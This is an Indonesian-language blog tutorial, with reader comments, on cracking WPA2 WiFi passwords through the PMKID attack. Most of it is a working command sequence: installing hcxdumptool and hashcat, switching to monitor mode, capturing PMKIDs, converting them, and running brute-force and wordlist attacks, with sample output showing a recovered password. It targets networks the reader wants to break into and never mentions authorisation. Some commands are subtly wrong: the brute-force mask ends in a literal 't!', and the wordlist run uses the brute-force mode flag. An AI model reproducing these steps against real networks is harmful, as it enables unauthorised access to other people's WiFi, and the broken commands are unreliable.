Now Trending:

Tutorial Hack WiFi: Cracking Password WPA2 dengan PMKID Attack

November 19, 2019 WiFi Hacking 21 Comments

Tutorial Hack WiFi: Cracking Password WPA2 dengan PMKID Attack. Metode cracking WPA2 saat ini lebih mudah setelah ditemukannya teknik PMKID attack dimana kita tidak lagi membutuhkan proses handshake dari jaringan WiFi yang ingin diserang. Itu artinya bahkan meskipun di SSID tersebut sedang tidak ada yang login, kalian tetap bisa melakukan dump PMKID dari router yang menggunakan keamanan WPA2, yang kemudian kita bisa melakukan cracking dari informasi yang didapat tersebut.

Metode ini ditemukan oleh Jens ‘Atom’ Steube, orang dibalik tool cracking populer, Hashcat. Menurutnya, metode ini akan efektif terhadap hampir seluruh router yang menggunakan jaringan 802.11i/p/q/r dengan fungsi roaming diaktifkan.

Oke pertama, kita install dependensi yang dibutuhkan terlebih dahulu.

sudo apt-get update
sudo apt-get install git libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev

Selanjutnya install hcxtool

cd /tmp
git clone https://github.com/ZerBea/hcxdumptool.git
cd hcxdumptool
make
sudo make install

cd /tmp
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install

Selanjutnya adalah instalasi hashcat. Di distro pentest seperti Kali Linux atau BackBox, tool ini sudah ada di repository dan dapat diinstall menggunakan perintah

sudo apt-get update && sudo apt-get install hashcat

Namun jika kalian tidak menemukan hashcat di repository, kalian bisa download melalui link berikut:
https://github.com/hashcat/hashcat

Oke lanjut ke proses hack WiFi.

Masuk ke mode monitor terlebih dahulu. Sebelumnya, kalian periksa dulu nama interface network kalian dengan perintah

ifconfig

Oke, interface yang kita gunakan adalah wlan0. Masuk ke mode monitor dengan command

sudo airmon-ng check kill
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up

Sekarang kita gunakan hcxdumptool untuk menyerang PMKID dari SSID yang rentan.

sudo hcxdumptool -i wlan0 -o pwn.pcapng --enable_status=1

wlan0 adalah nama interface, pwn.pcapng adalah outputnya. Kalian sesuaikan sendiri.

Jika PMKID sudah ditemukan, kalian bisa hentikan proses dengan menekan Ctrl+ C.

Lanjut, kita convert file pcapng agar bisa dicrack menggunakan hashcat.

hcxpcaptool -z pwn.16800 pwn.pcapng

Terakhir adalah proses cracking menggunakan hashcat.

Di real case mungkin kalian bisa menggunakan brute force dengan mencoba seluruh kombinasi karakter 8 digit.

sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

Atau, kalian bisa juga menggunakan password list untuk melakukan dictionary attack. List password kalian bebas mau ambil darimana, namun rekomendasi saya adalah ini:

  • https://github.com/danielmiessler/SecLists/tree/master/Passwords

Jika sudah didownload, jalankan command

sudo hashcat -m 16800 pwn.16800 -a 3 -w 3 --force 'wifi-password.txt'

wifi-password.txt adalah nama file berisi kumpulan password. Sesuaikan sendiri.

Output

d5fb59dc80f6c9db1aae2e8c1112bd31*0c3747bda154*60f67797ee0b*4152505553444f4b:44332211

Password WiFinya adalah 44332211.

Oke mungkin sekian tutorial singkat kali ini, semoga bermanfaat. Jika ada yang ingin ditanyakan silahkan tinggalkan komentar.

Shares

Related Posts

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

21 Comments

  1. Lukman November 19, 2019 Reply

    Apakah cara tersebut bisa juga digunakan dgn termux

    • kiryuu November 19, 2019 Reply

      bisa

    • _reduce November 19, 2019 Reply

      kyknya sih engga

    • Yoo Cherry November 20, 2019 Reply

      gatau. coba aja. gw make laptop terus soalnya

    • Ivan hb November 21, 2019 Reply

      Gak bisa gan ane udah coba.

  2. Unknowm November 20, 2019 Reply

    Ini pake aplikasi apa ??

    • Yoo Cherry November 20, 2019 Reply

      kalo baca jangan judulnya doang babi

      • 4R981 November 22, 2019 Reply

        akwoakwoa literasi -100

  3. Rusdi November 20, 2019 Reply

    Ini buat win 7 32bit bisa ?

  4. Anonym November 20, 2019 Reply

    Hahaha

  5. . November 20, 2019 Reply

    Linux tolol, makanya kalo baca tuh jangan judul doang, babi

  6. Heru November 21, 2019 Reply

    Gagal terus ini pas step di “make”
    Makefile20: recipe for target ‘build’ failed
    gimana ya ini? saya pake ubuntu di windows 10 sih… mungkin gegara itu?

    • Yoo Cherry November 23, 2019 Reply

      wsl gak akan bisa dipake lagian bro. wireless network interface nya gaada

  7. Unknown November 22, 2019 Reply

    Tolong bikin video nya donk… Saya masih awam

  8. parjo November 28, 2019 Reply

    gak ke detect apa gimana gan?

  9. Lexy December 19, 2019 Reply

    Wkwkw ini sangat membantu

  10. wiyan December 20, 2019 Reply

    Izin download toolsnya

  11. geng January 12, 2020 Reply

    Common-Credentials find . -name ‘*_*’ -exec rename ‘s/_/-/g’ “{}” \; 8 months ago
    Cracked-Hashes Quick rename of files 2 years ago
    Default-Credentials Merge pull request #357 from govolution/patch-3 3 months ago
    Honeypot-Captures 51k random creds obtained by running Heralding for two weeks in Sep/2019 3 months ago
    Leaked-Databases Better filenames 8 months ago
    Malware Close #291 – Fix encoding issues 8 months ago
    Permutations rename ‘s/_/-/g’ 2 years ago
    Software Close #291 – Fix encoding issues 8 months ago
    WiFi-WPA Add “-” to split up words, moved files since PR accepted 2 years ago
    Keyboard-Combinations.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    Most-Popular-Letter-Passes.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    PHP-Magic-Hashes.txt Adding sha256 magic hash 6 months ago
    README.md removes exec. bits last year
    SCRABBLE-hackerhouse.tgz Add scrabble 5 months ago
    UserPassCombo-Jay.txt “Passwords/” Clean up 3 years ago
    bt4-password.txt Close #291 – Fix encoding issues 8 months ago
    cirt-default-passwords.txt Fix for #201 – \_ -> _ 2 years ago
    clarkson-university-82.txt Quick rename of files 2 years ago
    darkc0de.txt Close #291 – Fix encoding issues 8 months ago
    darkweb2017-top10.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    darkweb2017-top100.txt Close #291 – Fix encoding issues 8 months ago
    darkweb2017-top1000.txt Close #291 – Fix encoding issues 8 months ago
    darkweb2017-top10000.txt Close #291 – Fix encoding issues 8 months ago
    der-postillon.txt Add worlds-safest-password list by Der Postillon 9 months ago
    dutch_wordlist Added dutchwordlist 3 months ago
    mssql-passwords-nansh0u-guardicore.txt Add MSSQL from guardicore: labs_campaigns-Nansh0u 8 months ago
    openwall.net-all.txt Close #291 – Fix encoding issues 8 months ago
    probable-v2-top12000.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    probable-v2-top1575.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    probable-v2-top207.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    richelieu-french-top20000.txt Add richelieu 6 months ago
    richelieu-french-top5000.txt Add richelieu 6 months ago
    stupid-ones-in-production.txt Create stupid-ones-in-production.txt 5 months ago
    twitter-banned.txt Added POTUS Twitter password 2 years ago
    unkown-azul.txt Add “-” to split up words, moved files since PR accepted 2 years ago
    url-to-download-passwords.md Close #154 – 1.4 billion password breach compilation wordlist 6 months ago
    xato-net-10-million-passwords-10.txt Close #293 – Ten Million Passwords 8 months ago
    xato-net-10-million-passwords-100.txt Close #293 – Ten Million Passwords 8 months ago
    xato-net-10-million-passwords-1000.txt Close #293 – Ten Million Passwords 8 months ago
    xato-net-10-million-passwords-10000.txt Close #293 – Ten Million Passwords 8 months ago
    xato-net-10-million-passwords-100000.txt Close #291 – Fix encoding issues 8 months ago
    xato-net-10-million-passwords-1000000.txt Close #291 – Fix encoding issues 8 months ago
    xato-net-10-million-passwords-dup.txt Close #291 – Fix encoding issues 8 months ago
    xato-net-10-million-passwords.txt Close #291 – Fix encoding issues 8 months ago

    • geng January 12, 2020 Reply

      kan buka ini https://github.com/danielmiessler/SecLists/tree/master/Passwords
      teru hasilnya ini:
      =================================================================
      Common-Credentials find . -name ‘*_*’ -exec rename ‘s/_/-/g’ “{}” \; 8 months ago
      Cracked-Hashes Quick rename of files 2 years ago
      Default-Credentials Merge pull request #357 from govolution/patch-3 3 months ago
      Honeypot-Captures 51k random creds obtained by running Heralding for two weeks in Sep/2019 3 months ago
      Leaked-Databases Better filenames 8 months ago
      Malware Close #291 – Fix encoding issues 8 months ago
      Permutations rename ‘s/_/-/g’ 2 years ago
      Software Close #291 – Fix encoding issues 8 months ago
      WiFi-WPA Add “-” to split up words, moved files since PR accepted 2 years ago
      Keyboard-Combinations.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      Most-Popular-Letter-Passes.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      PHP-Magic-Hashes.txt Adding sha256 magic hash 6 months ago
      README.md removes exec. bits last year
      SCRABBLE-hackerhouse.tgz Add scrabble 5 months ago
      UserPassCombo-Jay.txt “Passwords/” Clean up 3 years ago
      bt4-password.txt Close #291 – Fix encoding issues 8 months ago
      cirt-default-passwords.txt Fix for #201 – \_ -> _ 2 years ago
      clarkson-university-82.txt Quick rename of files 2 years ago
      darkc0de.txt Close #291 – Fix encoding issues 8 months ago
      darkweb2017-top10.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      darkweb2017-top100.txt Close #291 – Fix encoding issues 8 months ago
      darkweb2017-top1000.txt Close #291 – Fix encoding issues 8 months ago
      darkweb2017-top10000.txt Close #291 – Fix encoding issues 8 months ago
      der-postillon.txt Add worlds-safest-password list by Der Postillon 9 months ago
      dutch_wordlist Added dutchwordlist 3 months ago
      mssql-passwords-nansh0u-guardicore.txt Add MSSQL from guardicore: labs_campaigns-Nansh0u 8 months ago
      openwall.net-all.txt Close #291 – Fix encoding issues 8 months ago
      probable-v2-top12000.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      probable-v2-top1575.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      probable-v2-top207.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      richelieu-french-top20000.txt Add richelieu 6 months ago
      richelieu-french-top5000.txt Add richelieu 6 months ago
      stupid-ones-in-production.txt Create stupid-ones-in-production.txt 5 months ago
      twitter-banned.txt Added POTUS Twitter password 2 years ago
      unkown-azul.txt Add “-” to split up words, moved files since PR accepted 2 years ago
      url-to-download-passwords.md Close #154 – 1.4 billion password breach compilation wordlist 6 months ago
      xato-net-10-million-passwords-10.txt Close #293 – Ten Million Passwords 8 months ago
      xato-net-10-million-passwords-100.txt Close #293 – Ten Million Passwords 8 months ago
      xato-net-10-million-passwords-1000.txt Close #293 – Ten Million Passwords 8 months ago
      xato-net-10-million-passwords-10000.txt Close #293 – Ten Million Passwords 8 months ago
      xato-net-10-million-passwords-100000.txt Close #291 – Fix encoding issues 8 months ago
      xato-net-10-million-passwords-1000000.txt Close #291 – Fix encoding issues 8 months ago
      xato-net-10-million-passwords-dup.txt Close #291 – Fix encoding issues 8 months ago
      xato-net-10-million-passwords.txt Close #291 – Fix encoding issues 8 months ago
      ===================================================================

      nah yg di download yg mana? saya masih awam bgt, tolong pentujuknya
      Thanks before

  12. AERION April 29, 2020 Reply

    gan kalau telnetnya filtered gimana solusinya

Leave a Reply